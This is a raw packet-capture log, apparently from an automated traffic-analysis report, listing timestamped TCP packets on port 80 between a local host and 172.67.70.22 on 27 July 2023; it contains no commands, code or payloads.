                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.584346056 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.584356070 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.584383011 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.584388971 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.584425926 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585232973 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585278988 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585300922 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585318089 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585325003 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585357904 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585366011 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585393906 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585402966 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.585438967 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586138964 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586184978 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586203098 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586229086 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586236000 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586270094 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586273909 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586308002 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586313963 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.586353064 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587069035 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587116003 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587156057 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587194920 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587227106 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587270975 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587302923 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587892056 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587958097 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587973118 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.587997913 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588004112 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588041067 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588047028 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588082075 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588083982 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588124990 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588831902 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588877916 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588893890 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588918924 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588923931 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588958979 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588964939 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.588998079 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589009047 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589046001 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589783907 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589831114 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589835882 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589870930 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589884043 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589910984 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589910984 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589952946 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589956999 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.589994907 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590698957 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590744972 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590754986 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590790033 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590791941 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590822935 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590833902 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.590868950 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591360092 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591402054 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591422081 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591440916 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591458082 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591480017 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591491938 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591523886 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591536999 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.591582060 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592319965 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592366934 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592374086 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592407942 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592410088 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592449903 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592449903 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592490911 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592499971 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.592534065 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593296051 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593341112 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593353033 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593379974 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593384027 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593417883 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593424082 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593456030 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593460083 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.593497038 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594141960 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594182968 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594197035 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594211102 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594223022 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594240904 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594252110 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.594279051 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600434065 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600472927 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600527048 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600563049 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600594997 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600608110 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600631952 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600658894 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600677967 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600688934 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600707054 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600716114 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600743055 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.600763083 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601505995 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601541042 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601563931 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601583958 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601584911 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601613045 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601624966 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601641893 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601653099 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.601682901 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602432966 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602487087 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602514982 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602514982 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602539062 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602545023 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602556944 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602575064 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602587938 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.602617025 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603285074 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603321075 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603349924 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603348970 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603370905 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603378057 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603391886 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603406906 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603420973 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.603447914 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604161024 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604197025 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604227066 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604238987 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604254007 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604279995 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604290009 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604295969 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604309082 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.604341030 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605053902 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605091095 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605112076 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605118990 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605135918 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605149031 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605168104 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605178118 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605192900 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605221033 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605911016 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605969906 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.605984926 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606000900 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606014013 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606030941 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606044054 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606060982 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606072903 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606103897 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606735945 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606770992 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606790066 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606801033 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606813908 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606828928 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606842995 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606857061 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606870890 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606885910 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606900930 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.606928110 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.607698917 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.607733011 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.607755899 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.607763052 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.607793093 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.607811928 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608163118 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608196974 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608217955 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608237982 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608239889 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608279943 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608298063 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608330965 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608356953 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608359098 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608386993 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.608427048 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609169960 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609203100 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609224081 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609230042 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609246016 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609258890 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609275103 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609286070 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609301090 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609313011 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609324932 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.609354973 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610177040 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610203981 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610228062 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610232115 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610254049 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610261917 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610275030 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610287905 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610306025 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610311985 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610331059 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.610354900 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611057043 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611085892 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611109972 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611109972 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611130953 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611135960 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611152887 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611160994 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611181974 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611208916 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611243963 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611881018 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611912966 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611934900 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611942053 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611958027 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611963987 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611984968 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.611984968 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612004042 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612008095 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612027884 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612050056 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612742901 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612772942 CEST8049806172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612792969 CEST4980680192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.612793922 CEST8049806172.67.70.22192.168.2.4
